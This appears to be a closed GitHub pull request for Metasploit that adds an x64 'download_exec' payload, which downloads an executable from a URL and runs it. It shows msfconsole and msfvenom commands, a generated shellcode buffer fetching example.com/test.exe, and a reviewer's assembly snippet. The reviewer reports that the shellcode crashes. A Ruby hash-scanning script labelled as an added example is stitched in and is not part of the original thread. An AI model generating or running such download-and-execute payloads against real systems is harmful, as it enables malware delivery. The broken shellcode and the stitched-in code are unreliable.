Converted the download_exec windows payload to support x64 (Fixes Issue #12876) #19988

Closed
wants to merge 4 commits

Conversation

@its-mr-monday its-mr-monday commented Mar 27, 2025

Fixes #12876

The commit used the windows download_exec payload as a reference (x86); I figured that it would be useful to other operators to have an x64 variant of the payload.

Verification

It's a simple drop-in-place payload: copy it over to the payloads/singles/windows/x64 directory and, in my case, run:

  • reload_all

From here you should have the payload loaded; to generate a sample you may run:

  • use payload/windows/x64/download_exec
  • set EXE <executable name to drop on disk>
  • set URL <endpoint of hosted PE file>
  • (OPTIONAL) set EXITFUNC <seh/thread/process/none>
  • generate

The module does not exploit anything; it simply drops a PE file on disk and calls CreateProcessA to spawn a process.

Here is an example usage:

msf6 > use windows/x64/download_exec
msf6 payload(windows/x64/download_exec) > set EXE test.exe
EXE => test.exe
msf6 payload(windows/x64/download_exec) > set URL https://example.com/test.exe
URL => https://example.com/test.exe
msf6 payload(windows/x64/download_exec) > set EXITFUNC thread
EXITFUNC => thread
msf6 payload(windows/x64/download_exec) > generate
# windows/x64/download_exec - 526 bytes
# https://metasploit.com/
# VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# URL=https://example.com/test.exe, EXE=test.exe
buf =
"\xfc\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48" +
"\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" +
"\x20\x48\x0f\xb7\x4a\x4a\x48\x8b\x72\x50\x4d\x31\xc9\x48" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" +
"\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41\x51\x8b\x42\x3c" +
"\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f\x85\x72\x00\x00" +
"\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" +
"\xd0\x50\x44\x8b\x40\x20\x49\x01\xd0\x8b\x48\x18\xe3\x56" +
"\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x48" +
"\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1" +
"\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40" +
"\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" +
"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e" +
"\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52" +
"\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4b\xff\xff\xff" +
"\x5d\x48\x83\xec\x20\x48\xb9\x77\x69\x6e\x69\x6e\x65\x74" +
"\x00\x51\x54\x48\x89\xe1\x48\xc7\xc2\x4c\x77\x26\x07\xff" +
"\x55\xf8\x48\x83\xc4\x20\x48\x31\xc9\x48\x89\xca\x49\x89" +
"\xc8\x49\x89\xc9\x48\x8d\x4c\x24\x08\x48\xb8\x3a\x56\x79" +
"\xa7\x00\x00\x00\x00\xff\x55\xf8\x48\x8d\x54\x24\x20\x41" +
"\xb8\xbb\x01\x00\x00\x45\x31\xc9\x44\x89\x4c\x24\x28\x44" +
"\x89\x4c\x24\x30\x44\x89\x4c\x24\x38\x48\xc7\x44\x24\x40" +
"\x03\x00\x00\x00\x44\x89\x4c\x24\x48\x48\x89\x44\x24\x50" +
"\x48\xb8\x57\x89\x9f\xc6\x00\x00\x00\x00\xff\x55\xf8\x48" +
"\x31\xc9\x48\x31\xd2\x49\x89\xe0\x45\x31\xc9\x44\x89\x4c" +
"\x24\x08\x41\xb9\x00\x00\x40\x08\x48\xc7\xc0\xeb\x55\x2e" +
"\x3b\xff\x55\xf8\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d" +
"\x31\xc9\x48\xc7\xc0\x2d\x06\x18\x7b\xff\x55\xf8\x48\x31" +
"\xc9\x48\x89\xe2\x4d\x31\xc0\x41\xb9\x02\x00\x00\x00\x48" +
"\xc7\x44\x24\x08\x02\x00\x00\x00\x48\x31\xc0\x48\x89\x44" +
"\x24\x10\x48\x89\x44\x24\x18\x48\x89\x44\x24\x20\x48\xc7" +
"\xc0\xda\xf6\xda\x4f\xff\x55\xf8\x48\x89\xc1\x48\x89\xda" +
"\x49\x89\xf8\x4c\x8d\x4c\x24\x08\x48\xc7\xc0\x2d\x57\xae" +
"\x5b\xff\x55\xf8\x48\x89\xc1\x48\xc7\xc0\xc6\x96\x87\x52" +
"\xff\x55\xf8\x48\x8d\x4c\x24\x20\x48\x31\xd2\x49\x89\xd0" +
"\x49\x89\xd1\x48\xb8\x79\xcc\x3f\x86\x00\x00\x00\x00\xff" +
"\x55\xf8\x45\x31\xc9\x48\xc7\xc1\x00\x00\x00\x00\x48\xc7" +
"\xc2\xe0\x1d\x2a\x0a\xff\x55\xf8"

You may also use it with msfvenom to generate shellcode:

msfvenom -p windows/x64/download_exec -f <output_fmt> EXE=<executable> URL=<url> EXITFUNC=<exitfunc>

@its-mr-monday its-mr-monday changed the title from "Converted the download_exec windows payload to support x64" to "Converted the download_exec windows payload to support x64 (Fixes Issue #12876)" on Mar 27, 2025
its-mr-monday and others added 2 commits March 27, 2025 10:40
Co-authored-by: Spencer McIntyre <[email protected]>
Ensured the URI matches the supported schemes; if not, an "Invalid URL" error will print and return null
@dledda-r7 dledda-r7 self-assigned this Mar 28, 2025
@dledda-r7 dledda-r7 added payload rn-payload-enhancement release notes for enhanced payloads labels Mar 28, 2025
@dledda-r7 dledda-r7 moved this to In Progress in Metasploit Kanban Mar 28, 2025
Simply fixed the tab indenting at the EOF
@dledda-r7 dledda-r7 (Contributor) left a comment

Hello @its-mr-monday,
I have tried the payload but it is crashing, and I have addressed just a couple of issues:

  • the block api is stored in rbp but then [rbp-0x80] is used, which causes a segfault.
  • the register to store the block_api_hash for block-api x64 is r10d

I didn't look for other errors, but even after correcting the two mentioned issues in the whole payload code it's still crashing.

I am leaving here just a sample of correct API calling.

    start:
      pop rbp                      ; rbp = address of the block_api stub (pushed by the call that landed here)
    load_wininet:
      sub rsp, 32                  ; shadow space required by the x64 calling convention
      mov rcx, 0x0074656e696e6977 ; "wininet\0" as a little-endian qword
      push rcx                     ; place the string on the stack
      mov rcx, rsp                 ; rcx (1st argument) = pointer to "wininet\0"
      mov r10d, #{Rex::Text.block_api_hash('kernel32.dll', 'LoadLibraryA')} ; block_api takes the hash in r10d
      call rbp                     ; block_api resolves kernel32!LoadLibraryA and jumps to it
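
Added example (Ruby), not code from this PR or from Metasploit: it reimplements the ROR13 "block API" hash that `Rex::Text.block_api_hash` produces, which the x64 block_api stub expects in r10d right before `call rbp`, and then scans a byte string for the immediate loads the PR's generated output uses for those hashes. The two inputs are constructed: the first is the fragment `48 c7 c2 4c 77 26 07 ff 55 f8` from the generated output above (`mov rdx, 0x0726774C` followed by `ff 55 f8`, which decodes to `call [rbp-8]`, an indirect call through the stack slot rather than a call to the stub in rbp); the second is the same step laid out as in the reviewer's sample (`mov r10d, hash; call rbp`). The import list, the `describe_call`/`find_hash_loads` helpers and their names are the example's own assumptions; the page only names LoadLibraryA and CreateProcessA.

```ruby
# Added example, not Metasploit code. Reimplements the ROR13 block_api hash
# (what Rex::Text.block_api_hash returns) and checks how a shellcode blob loads it.

MASK32 = 0xFFFFFFFF

# 32-bit rotate right by `count` bits.
def ror32(value, count)
  ((value >> count) | (value << (32 - count))) & MASK32
end

# For each byte: rotate the running hash right by 13, then add the byte.
def ror13_hash(bytes)
  bytes.each_byte.inject(0) { |h, b| (ror32(h, 13) + b) & MASK32 }
end

# Module name: upper-cased UTF-16LE *including* its null terminator (the stub
# hashes BaseDllName over MaximumLength); function name: ASCII including its
# null. The two running hashes are summed modulo 2**32.
def block_api_hash(libname, funcname)
  unicode_lib = (libname.upcase + "\x00").encode('UTF-16LE').b
  (ror13_hash(unicode_lib) + ror13_hash((funcname + "\x00").b)) & MASK32
end

# Encode "mov r10d, imm32" (REX.B + B8/r with r10 => 41 BA imm32), the load the
# x64 block_api stub wants immediately before "call rbp".
def mov_r10d(imm32)
  "\x41\xBA".b + [imm32 & MASK32].pack('V')
end

# Opcode prefixes used to load 32/64-bit immediates in the generated bytes above,
# the register each one writes, and the pack format of the immediate.
HASH_LOADS = {
  "\x41\xBA".b     => ['r10d', 'V'],  # mov r10d, imm32  (what block_api x64 expects)
  "\x48\xC7\xC2".b => ['rdx',  'V'],  # mov rdx, imm32   (sign-extended; the PR's LoadLibraryA load)
  "\x48\xC7\xC0".b => ['rax',  'V'],  # mov rax, imm32
  "\x48\xB8".b     => ['rax',  'Q<'], # mov rax, imm64
}.freeze

# Assumed import list for a download-and-execute stub (the example's own choice).
IMPORTS = {
  'kernel32.dll' => %w[LoadLibraryA CreateFileA WriteFile CloseHandle CreateProcessA ExitThread ExitProcess],
  'wininet.dll'  => %w[InternetOpenA InternetConnectA HttpOpenRequestA HttpSendRequestA InternetReadFile],
}.freeze

KNOWN_HASHES = IMPORTS.flat_map { |lib, fns| fns.map { |fn| [block_api_hash(lib, fn), "#{lib}!#{fn}"] } }.to_h.freeze

# Decode the instruction following a hash load: "FF D5" is "call rbp" (the stub
# address), "FF 55 disp8" is "call [rbp+disp8]", an indirect call through the stack.
def describe_call(bytes)
  case bytes.byteslice(0, 2)
  when "\xFF\xD5".b then 'call rbp'
  when "\xFF\x55".b
    disp = bytes.getbyte(2)
    disp.nil? ? 'truncated' : format('call [rbp%+d]', disp >= 0x80 ? disp - 0x100 : disp)
  else 'no call'
  end
end

# Walk the blob and report every immediate load whose value is a known block_api
# hash: which register got it, and what is called next. Opcode bytes alone would
# false-positive, so a hit must also resolve to a known hash.
def find_hash_loads(shellcode, known = KNOWN_HASHES)
  shellcode = shellcode.b
  hits = []
  i = 0
  while i < shellcode.bytesize
    prefix, (reg, fmt) = HASH_LOADS.find { |p, _| shellcode.byteslice(i, p.bytesize) == p }
    if prefix
      width = fmt == 'V' ? 4 : 8
      imm = shellcode.byteslice(i + prefix.bytesize, width)
      if imm && imm.bytesize == width && (name = known[imm.unpack1(fmt) & MASK32])
        after = i + prefix.bytesize + width
        hits << { offset: i, reg: reg, name: name,
                  call: describe_call(shellcode.byteslice(after, 3) || ''.b),
                  ok: reg == 'r10d' }
        i = after
        next
      end
    end
    i += 1
  end
  hits
end

# Constructed inputs: the LoadLibraryA load from the PR's generated output
# (mov rdx, 0x0726774C; call [rbp-8]) and the same step as mov r10d, hash; call rbp.
PR_FRAGMENT    = "\x48\xC7\xC2\x4C\x77\x26\x07\xFF\x55\xF8".b
FIXED_FRAGMENT = mov_r10d(block_api_hash('kernel32.dll', 'LoadLibraryA')) + "\xFF\xD5".b

if __FILE__ == $PROGRAM_NAME
  printf("block_api_hash('kernel32.dll', 'LoadLibraryA') = 0x%08X\n", block_api_hash('kernel32.dll', 'LoadLibraryA'))
  [PR_FRAGMENT, FIXED_FRAGMENT].each { |frag| p find_hash_loads(frag) }
end
```

Running it reports the PR fragment as a LoadLibraryA hash loaded into rdx and followed by `call [rbp-8]`, and the fixed fragment as the same hash in r10d followed by `call rbp`; the hash values it computes match the constants visible in the generated bytes above (0x0726774C for LoadLibraryA, 0x0A2A1DE0 for the EXITFUNC=thread ExitThread call).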

@github-project-automation github-project-automation bot moved this from In Progress to Waiting on Contributor in Metasploit Kanban Mar 31, 2025
@its-mr-monday its-mr-monday marked this pull request as draft April 1, 2025 14:53
@dledda-r7 dledda-r7 removed the status in Metasploit Kanban May 22, 2025
@smcintyre-r7 smcintyre-r7 added the attic Older submissions that we still want to work on again label Jul 29, 2025
Thanks for your contribution to Metasploit Framework! We've looked at this pull request, and we agree that it seems like a good addition to Metasploit, but it looks like it is not quite ready to land. We've labeled it attic and closed it for now.

What does this generally mean? It could be one or more of several things:

  • It doesn't look like there has been any activity on this pull request in a while
  • We may not have the proper access or equipment to test this pull request, or the contributor doesn't have time to work on it right now.
  • Sometimes the implementation isn't quite right and a different approach is necessary.

We would love to land this pull request when it's ready. If you have a chance to address all comments, we would be happy to reopen and discuss how to merge this!

@github-actions github-actions bot closed this Jul 29, 2025
Successfully merging this pull request may close these issues: msfvenom -p windows/download_exec not working on 64bit / WOW64